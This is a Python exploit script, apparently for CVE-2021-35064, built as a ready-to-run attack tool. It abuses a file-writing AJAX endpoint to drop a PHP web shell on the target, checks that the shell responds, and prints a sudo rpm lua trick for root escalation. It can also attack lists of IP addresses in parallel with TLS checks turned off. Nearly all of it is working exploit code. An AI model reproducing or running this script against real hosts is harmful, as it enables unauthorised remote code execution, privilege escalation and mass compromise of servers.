import os import base64 import requests import argparse import sys, urllib3 import concurrent.futures from rich.console import Console urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) console = Console() banner=("ICAgX19fX19fICAgICBfX19fX19fICAgICBfX19fICAgX19fIF9fX18gIF8gICAgICBfX19fX19f" "X18gICBfX18gICBfXyAgIF8gIF8gICAKICAvIF9fX1wgXCAgIC8gLyBfX19ffCAgIHxfX18gXCAv" "IF8gXF9fXyBcLyB8ICAgIHxfX18gLyBfX198IC8gXyBcIC8gL18gfCB8fCB8ICAKIHwgfCAgICBc" "IFwgLyAvfCAgX3wgX19fX18gX18pIHwgfCB8IHxfXykgfCB8X19fX18gfF8gXF9fXyBcfCB8IHwg" "fCAnXyBcfCB8fCB8XyAKIHwgfF9fXyAgXCBWIC8gfCB8X198X19fX18vIF9fL3wgfF98IC8gX18v" "fCB8X19fX198X18pIHxfXykgfCB8X3wgfCAoXykgfF9fICAgX3wKICBcX19fX3wgIFxfLyAgfF9f" "X19ffCAgIHxfX19fX3xcX19fL19fX19ffF98ICAgIHxfX19fL19fX18vIFxfX18vIFxfX18vICAg" "fF98ICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg" "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKCQkgICAgICAgICBDb2RlZCBCeSBWYWxlbnRp" "biBMb2JzdGVpbgo=" ) def exploit(host): writeFile(host) console.log(getResult(host)) def writeFile(host): try: headers = { "Host": f"{host}", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0", "Accept": "text/html, */*", "Accept-Language": "en-GB,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Sec-Gpc": "1", "Te": "trailers", "Connection": "close" } # write php web shell into the Apache web directory data = { "radioBtnVal":'', "associateFileName": "/var/www/html/balgo.php"} requests.post(f"https://{host}/ajaxPages/writeBrowseFilePathAjax.php", headers=headers, data=data, timeout=2, verify=False) except (requests.exceptions.Timeout,requests.exceptions.ConnectionError,requests.exceptions.InvalidURL,requests.exceptions.SSLError): console.log(f"[red][!] Request timed out [/red] http://{host}/") def getResult(host): # query the web shell, using rpm as sudo for root privileges dropper_exec = requests.get(f"https://{host}/balgo.php", timeout=2,verify=False) file = requests.get(f"https://{host}/pwny.php", timeout=2, verify=False) #sudo rpm --eval '%{lua:os.execute(\"" + cmd + "\")} pageText = file.text if 'chocapik' in pageText: result = f"[green][<>] Exploited | Shell : [bold]https://{host}/pwny.php[/bold][/green]\n" result += "[green][<>] For root : sudo rpm --eval '%{lua:os.execute(\"\")}'[/green]" else: result = f"[red][!] Fail [/red] http://{host}/" return result def main(): print("\n" + base64.b64decode(banner).decode("utf-8")) parser = argparse.ArgumentParser(prog="CVE-2021-35064.py", description="Example : python3 %(prog)s -i 127.0.0.1") parser.add_argument("-i", help="IP address (not url)") parser.add_argument("-f", help="IP file") args = parser.parse_args() if not args.f and not args.i: parser.print_help() sys.exit() if args.i and not args.f: exploit(args.i) if args.f and not args.i: with open(f"{os.getcwd()}/{args.f}",'r') as f: ip_list = f.readlines() with console.status("[bold green]Exploiting...", spinner='aesthetic') as status: executor = concurrent.futures.ProcessPoolExecutor(20) futures = [executor.submit(exploit, ip.strip().split('\n')[0]) for ip in ip_list] concurrent.futures.wait(futures) exit() if __name__ == "__main__": main()